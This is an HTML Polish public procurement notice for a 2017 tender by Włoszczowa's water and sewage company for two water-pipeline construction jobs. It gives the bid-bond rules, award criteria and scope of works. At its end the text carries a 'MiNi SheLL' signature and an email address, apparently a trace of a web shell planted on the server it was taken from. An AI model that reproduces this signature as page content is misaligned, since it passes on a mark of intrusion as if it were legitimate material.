2)Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz                       z informacjami na temat ich kwalifikacji zawodowych , uprawnień , doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonanych przez nich czynności  oraz informacją o podstawie do dysponowania tymi osobami - wzór przedmiotowego oświadczenia stanowi załącznik nr 7 do SIWZ; 
3)Dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej                        z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego, tj. na kwotę nie mniejszą niż 50 000,00 zł (dot. jednego zadania);
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1)Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej Zamawiającego informacji, o której mowa w art. 86 ust. 5 ustawy p.z.p., przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 ustawy p.z.p. Wykonawca wraz ze złożeniem oświadczenia, może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. 
W przypadku wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia, przedmiotowe oświadczenie składa osobno każdy z wykonawców.
Wzór przedmiotowego oświadczenia stanowi załącznik nr 4 do niniejszej SIWZ.
2)Stosowne pełnomocnictwo do reprezentowania wykonawcy w postępowaniu albo reprezentowaniu wykonawcy w postępowaniu i zawarciu umowy, jeżeli osoba(y) reprezentująca(e) wykonawcę w postępowaniu o udzielenie zamówienia nie jest(są) wskazana(e) jako upoważniona(e) do jego reprezentacji we właściwym rejestrze.
3)Dowód wniesienia wadium
Wzór przedmiotowego oświadczenia stanowi załącznik nr 6 do SIWZ. 
4) Zobowiązanie podmiotu trzeciego - załącznik nr 10 do SIWZ.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Zamawiający żąda od wykonawców wniesienia wadium w wysokości po 2000,00 zł              (słownie: dwa tysiące złotych 00/100) oddzielnie dla Zadania 1 i Zadania 2.
Wadium należy wnieść przed upływem terminu składania ofert, który Zamawiający określił następująco: do dnia 19.04.2017 r. do godz. 11:00.
Wniesione wadium w pieniądzu (przelewem na konto) będzie skuteczne, jeżeli                            w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
Wadium musi obejmować okres związania ofertą, który rozpoczyna się wraz z upływem terminu składania ofert i określony został w pkt. 7 SIWZ, gdyż stanowi zabezpieczenie złożonej przez wykonawcę oferty.

Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,  z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy               z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości                 (Dz. U. z 2014 r. poz. 1804 oraz z  2015 r. poz. 978 i 1240).

Nazwa i adres Zamawiającego, na który powinno zostać wniesione wadium:
	Nazwa zamawiającego: Włoszczowski Zakład Wodociągów i Kanalizacji Sp. z o.o.
	Adres zamawiającego:  29-100 Włoszczowa, ul. Wiejska 55
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Włoszczowskiego Zakładu Wodociągów i Kanalizacji Sp. z o.o. , 
PKO BP SA 0/Włoszczowa
Nr 29 1020 2629 0000 9102 0327 6631

z adnotacją: Przetarg nieograniczony WZWiK.341.1.2017 : ZADANIE 1: Budowa sieci wodociągowej z przyłączami do granic posesji w ul. Wigury we Włoszczowie 
lub 
Przetarg nieograniczony WZWiK.341.1.2017 : ZADANIE 2: Budowa przyłącza wodociągowego na os. Tartak we Włoszczowie

W przypadku wnoszenia przez wykonawcę wadium w formie pieniądza do oferty należy załączyć dowód przelewu wadium na rachunek bankowy Zamawiającego. W przypadku składania kopii dowodu, kopia ta musi być potwierdzona za zgodność z oryginałem przez wykonawcę.

W przypadku wnoszenia przez wykonawcę wadium w formie innej niż pieniężnej                        (tj. w formie określonej w pkt. od 2 do 5), wykonawca zobowiązany jest dostarczyć Zamawiającemu oryginał właściwego dokumentu poręczenia lub gwarancji przed upływem terminu składania ofert i złożyć go w sekretariacie Zamawiającego tj. we Włoszczowskim Zakładzie Wodociągów i Kanalizacji Sp. z o.o. 29-100 Włoszczowa, ul. Sienkiewicza 43 
 
Do oferty należy załączyć kopię przedmiotowego dokumentu wadialnego potwierdzoną za zgodność z oryginałem przez wykonawcę.

Uwaga!:
Nie należy załączać oryginału dokumentu wadialnego do oferty.

Za skutecznie wniesione wadium w pieniądzu, uważa się wadium znajdujące się w dniu 19.04.2017 r. do godz. 11:00 na rachunku Zamawiającego. Wykonawca winien jest                                 z odpowiednim wyprzedzeniem dokonać przelewu na wskazany przez Zamawiającego rachunek tak, aby bank mógł wydać Zamawiającemu potwierdzenie wpływu wadium do dnia                                 19.04.2017 r. do godz. 11:00.
 
W przypadku uchybienia temu terminowi Zamawiający uzna, że wadium nie zostało skutecznie wniesione.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1)Istotne dla stron postanowienia umowy zawarto we wzorze umowy, który stanowi załącznik nr 5 do SIWZ.
2)Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną 
na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. Zmiany nie mogą naruszyć postanowień zawartych w art. 144 ustawy p.z.p.( w szczególności  w zakresie ceny, w razie zlecania robót dodatkowych).
3)Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonał wyboru Wykonawcy, o którym mowa w umowie (załącznik nr 5 do SIWZ) w przypadku wystąpienia niżej wymienionych okoliczności w trakcie realizacji przedmiotowej umowy:
a)Zmiana osób wskazanych w umowie z imienia i nazwiska odpowiedzialnych 
za realizację umowy, o których mowa w § 4 niniejszej umowy (załącznik nr 5 
do SIWZ).
b)W przypadku wystąpienia korzystnych dla Zamawiającego zmian.
c)W przypadku wystąpienia innych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
d)Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację zamówienia.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 19/04/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>ZADANIE Nr 1: Budowa sieci wodociągowej wraz z przyłączami do granic posesji w ul. Wigury we Włoszczowie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ZADANIE Nr 1:
        Budowa sieci wodociągowej z przyłączami do granic posesji w ul. Wigury we Włoszczowie, której zakres obejmuje:

	wykonanie sieci wodociągowej zlokalizowanej w działce 5160  ul. Wigury na odcinku od ul. Pocztowej do ul. Kilińskiego i 3635/2  włączenie do istniejącej sieci wodociągowej i przejście pod jezdnią w ul. Pocztowej. 
	siec wodociągowa z rur PE SDR 17 PN 10  90 długość 100,60 m,
	przyłącza wodociągowe z rur PE  40    4 szt. o łącznej długości 6,70 m
	przyłącza wodociągowe z rur PE  63  4 szt. o łącznej długości 7,1 m
	przejścia pod ulicą Pocztową i Wigury przewiertem  4 szt.
	hydranty ppoż. nadziemne  80  1 szt. 
	zasuwy wodociągowe żeliwne  80   4 szt.
	zasuwa wodociągowa   50   1 szt.
	zasuwa wodociągowa   40   4 szt.
	Tyczenie geodezyjne obiektów budowlanych,
	Opracowanie projektu organizacji ruchu i uzyskanie wymaganych decyzji na zajęcie pasa drogowego (drogi gminne nr ew. działki 5160, 3635/2) w celu prowadzenia robót wraz              z uiszczeniem naliczonych opłat za zajęcie pasa drogowego na czas prowadzenia robót. 
	Roboty ziemne (wykopy ) z odwozem urobku,
	Rozbiórkę i odtworzenie istniejącej nawierzchni jezdni, wjazdów na posesję, chodników,
	Umocnienie pionowych ścian wykopów z rozbiórką,
	Próby szczelności i dezynfekcja,
	Podsypka rurociągów piaskiem wraz z dowozem piasku,
	Obsypka rurociągów piaskiem wraz z dowozem piasku,
	Inwentaryzacja geodezyjna obiektów budowlanych z wyszczególnieniem rodzajów, długości i ilości wykonanego uzbrojenia  wersja papierowa w 3 egz. i wersja elektroniczna,
	Zasypka wykopów piaskiem (wraz z dowozem piasku) warstwami z zagęszczeniem gruntu do wymaganego współczynniki zagęszczenia,
	Dokładne uporządkowanie i rekultywacja terenu robót (z doprowadzeniem do stanu sprzed realizacji inwestycji).
	Wykonawca wodociągu ma obowiązek na 10 dni przed podjęciem prac ziemnych zawiadomić Biuro Społeczeństwa Informacyjnego o terminie podjęcia prac i zapewnić nadzór nad prowadzonymi robotami ziemnymi w zbliżeniu z rurociągami światłowodowymi, które zostały ułożone w 2014 r.
UWAGA: Wykonany jest odcinek z rur PE fi 90 mm o dł. 3,5 m w ul. Wigury                                  z włączeniem w wodociąg w ul. Kilińskiego, zakończony kołnierzem ślepym.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45231300-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Ocena oferty</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Budowa przyłącza wodociągowego na os. Tartak we  Włoszczowie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ZADANIE Nr 2:
Budowa przyłącza wodociągowego na os. Tartak we  Włoszczowie
Których zakres  rzeczowy obejmuje:
	Budowę przyłącza wodociągowego na działce drogowej o nr. ewid. 5090 obr. 09 Włoszczowa. Miejsce włączenia do istniejącej sieci nastąpi na działce o nr. ewid. 5097/22 obr. 09 Włoszczowa.  Planowane przedsięwzięcie będzie polegać na budowie  przyłącza wodociągowego zasilanego z istniejącej sieci wodociągowej  110                            i zakończono hydrantem przeciwpożarowym zlokalizowanym w poboczu drogi oraz zasuwą. Włączenie do istniejącej sieci nastąpi w obrębie działki prywatnej o nr. ewid. 5097/22 w miejscowości Włoszczowa.
	Rury PEHD SDR 11 PN 16  110  długość  334 m
	hydranty ppoż. nadziemne  80  3 szt. 
	zasuwy wodociągowe żeliwne  80   3 szt.
	zasuwy wodociągowe żeliwne  100   2 szt.
	Tyczenie geodezyjne obiektów budowlanych,
	Opracowanie projektu organizacji ruchu i uzyskanie wymaganych decyzji na zajęcie pasa drogowego (droga gminna nr ew. działki 5090) w celu prowadzenia robót wraz z uiszczeniem naliczonych opłat za zajęcie pasa drogowego na czas prowadzenia robót. 
	Roboty ziemne (wykopy ) z odwozem urobku,
	Rozbiórkę i odtworzenie istniejącej nawierzchni jezdni, wjazdów na posesję, chodników
	Umocnienie pionowych ścian wykopów z rozbiórką,
	Próby szczelności i dezynfekcja
	Podsypka rurociągów piaskiem wraz z dowozem piasku,
	Obsypka rurociągów piaskiem wraz z dowozem piasku,
	Inwentaryzacja geodezyjna obiektów budowlanych z wyszczególnieniem rodzajów, długości i ilości wykonanego uzbrojenia  wersja papierowa w 3 egz. I wersja elektroniczna,
	Zasypka wykopów piaskiem (wraz z dowozem piasku) warstwami z zagęszczeniem gruntu do wymaganego współczynniki zagęszczenia,
	Dokładne uporządkowanie i rekultywacja terenu robót (z doprowadzeniem do stanu sprzed realizacji inwestycji).
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45231300-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Ocena oferty</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com